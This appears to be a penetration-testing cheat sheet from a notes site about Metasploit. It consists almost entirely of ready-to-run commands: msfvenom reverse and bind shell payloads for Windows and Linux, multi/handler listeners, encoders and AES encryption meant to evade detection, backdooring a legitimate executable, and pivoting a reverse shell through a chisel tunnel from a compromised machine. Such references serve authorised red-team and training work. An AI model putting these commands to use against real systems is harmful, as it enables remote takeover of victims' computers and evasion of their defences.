Metasploit

Handler C2 Meterpreter

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"

Payload Windows

Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe

Bind Shell

msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe

Payload Linux

Reverse Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf

Bind Shell

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf

Metasploit Encoder

msfvenom --list encoders

# x86/shikata_ga_nai
# reverse shell  x86
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 -e x86/shikata_ga_nai -f exe -o shell.exe

# x64
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 -e x64/zutto_dekiru -f exe -o shell64.exe

# patch the legit exe with payload

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 -e <encoder> -x <legit exe> -f exe -o shell_legit.exe

msfvenom --list encrypt

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 --encrypt aes256 --encrypt-key <the key> -f exe -o shell_aes.exe

Metasploit Reverse Payload with Reverse Individual Proxy

tunnel reference:

Port Forwarding with C... | 0xBEN | Notesnotes.benheater.com

Compromised Machine

./chisel server --reverse --port 8000

Kali Linux

format: chisel client <server chisel>:<port> R:<linux port>:127.0.0.1:

chisel client 192.168.11.4:8000 R:50001:127.0.0.1:443

Generate Payload:

set LHOST to reachable port in compromised machine from target machine.

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.56.107 LPORT=50001 -f exe > proxy_payload.exe

Handler C2 Meterpreter:

because the tunnel set directly to loopback, make sure the LHOST is also loopback (127.0.0.1)

sudo msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_https;set LHOST 127.0.0.1;set LPORT 443;run;"

reference:

https://medium.com/@techmindxperts/complete-guide-to-metasploit-from-installation-to-exploit-development-eb89a507c07d

https://book.hacktricks.xyz/generic-methodologies-and-resources/reverse-shells/msfvenom

PreviousInvoke-ReflectivePEInjection NextMeterpreter Tricks

Last updated 1 year ago

hashtagHandler C2 Meterpreter

hashtagPayload Windows

hashtagReverse Shell

hashtagBind Shell

hashtagPayload Linux

hashtagReverse Shell

hashtagBind Shell

hashtagMetasploit Encoder

hashtagMetasploit Reverse Payload with Reverse Individual Proxy

Handler C2 Meterpreter

Payload Windows

Reverse Shell

Bind Shell

Payload Linux

Reverse Shell

Bind Shell

Metasploit Encoder

Metasploit Reverse Payload with Reverse Individual Proxy